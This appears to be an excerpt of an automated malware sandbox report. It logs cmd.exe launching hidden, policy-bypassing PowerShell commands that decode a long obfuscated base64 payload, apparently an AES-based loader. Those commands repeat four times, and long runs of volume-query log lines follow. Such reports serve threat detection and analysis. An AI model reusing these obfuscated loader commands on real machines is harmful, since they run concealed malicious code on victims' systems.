x3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibwb2n4ysgkcgfyyw1fdmfykxsjsuvyicckd29yynq9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckag5jdwe9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrmd2rucd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr3b3jidcwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzndkbnauq29wevrvkcrobmn1ysk7csrmd2rucc5eaxnwb3nlkck7csr3b3jidc5eaxnwb3nlkck7csrobmn1ys5eaxnwb3nlkck7csrobmn1ys5ub0fycmf5kck7fwz1bmn0aw9uigdtdm1ykcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr2chh2at1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgfibmt0psr2chh2as5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrhym5rdc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jg9udca9icrlbny6vvnfuk5btuu7jg5zb3rnid0gj0m6xfvzzxjzxccgkyakb250icsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakbnnvdgc7jg5rawt4pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibsbhf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnnwddowlvtupxt2i1n0x3sevha3b3wmhttlzwn0zmdzhpnxjxtgj4melxwt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnl0lvrjexnmj2nup6mhvfsgz0q2zmut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibwb2n4ysgkcgfyyw1fdmfykxsjsuvyicckd29yynq9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckag5jdwe9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrmd2rucd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr3b3jidcwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzndkbnauq29wevrvkcrobmn1ysk7csrmd2rucc5eaxnwb3nlkck7csr3b3jidc5eaxnwb3nlkck7csrobmn1ys5eaxnwb3nlkck7csrobmn1ys5ub0fycmf5kck7fwz1bmn0aw9uigdtdm1ykcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr2chh2at1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgfibmt0psr2chh2as5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrhym5rdc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jg9udca9icrlbny6vvnfuk5btuu7jg5zb3rnid0gj0m6xfvzzxjzxccgkyakb250icsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakbnnvdgc7jg5rawt4pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibsbhf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnnwddowlvtupxt2i1n0x3sevha3b3wmhttlzwn0zmdzhpnxjxtgj4melxwt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnl0lvrjexnmj2nup6mhvfsgz0q2zmut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibwb2n4ysgkcgfyyw1fdmfykxsjsuvyicckd29yynq9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckag5jdwe9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrmd2rucd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr3b3jidcwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzndkbnauq29wevrvkcrobmn1ysk7csrmd2rucc5eaxnwb3nlkck7csr3b3jidc5eaxnwb3nlkck7csrobmn1ys5eaxnwb3nlkck7csrobmn1ys5ub0fycmf5kck7fwz1bmn0aw9uigdtdm1ykcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr2chh2at1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgfibmt0psr2chh2as5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrhym5rdc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jg9udca9icrlbny6vvnfuk5btuu7jg5zb3rnid0gj0m6xfvzzxjzxccgkyakb250icsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakbnnvdgc7jg5rawt4pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibsbhf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnnwddowlvtupxt2i1n0x3sevha3b3wmhttlzwn0zmdzhpnxjxtgj4melxwt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnl0lvrjexnmj2nup6mhvfsgz0q2zmut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibwb2n4ysgkcgfyyw1fdmfykxsjsuvyicckd29yynq9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckag5jdwe9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrmd2rucd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr3b3jidcwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzndkbnauq29wevrvkcrobmn1ysk7csrmd2rucc5eaxnwb3nlkck7csr3b3jidc5eaxnwb3nlkck7csrobmn1ys5eaxnwb3nlkck7csrobmn1ys5ub0fycmf5kck7fwz1bmn0aw9uigdtdm1ykcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr2chh2at1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgfibmt0psr2chh2as5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrhym5rdc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jg9udca9icrlbny6vvnfuk5btuu7jg5zb3rnid0gj0m6xfvzzxjzxccgkyakb250icsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakbnnvdgc7jg5rawt4pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibsbhf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnnwddowlvtupxt2i1n0x3sevha3b3wmhttlzwn0zmdzhpnxjxtgj4melxwt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnl0lvrjexnmj2nup6mhvfsgz0q2zmut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibwb2n4ysgkcgfyyw1fdmfykxsjsuvyicckd29yynq9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckag5jdwe9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrmd2rucd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr3b3jidcwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzndkbnauq29wevrvkcrobmn1ysk7csrmd2rucc5eaxnwb3nlkck7csr3b3jidc5eaxnwb3nlkck7csrobmn1ys5eaxnwb3nlkck7csrobmn1ys5ub0fycmf5kck7fwz1bmn0aw9uigdtdm1ykcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr2chh2at1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgfibmt0psr2chh2as5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrhym5rdc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jg9udca9icrlbny6vvnfuk5btuu7jg5zb3rnid0gj0m6xfvzzxjzxccgkyakb250icsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakbnnvdgc7jg5rawt4pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
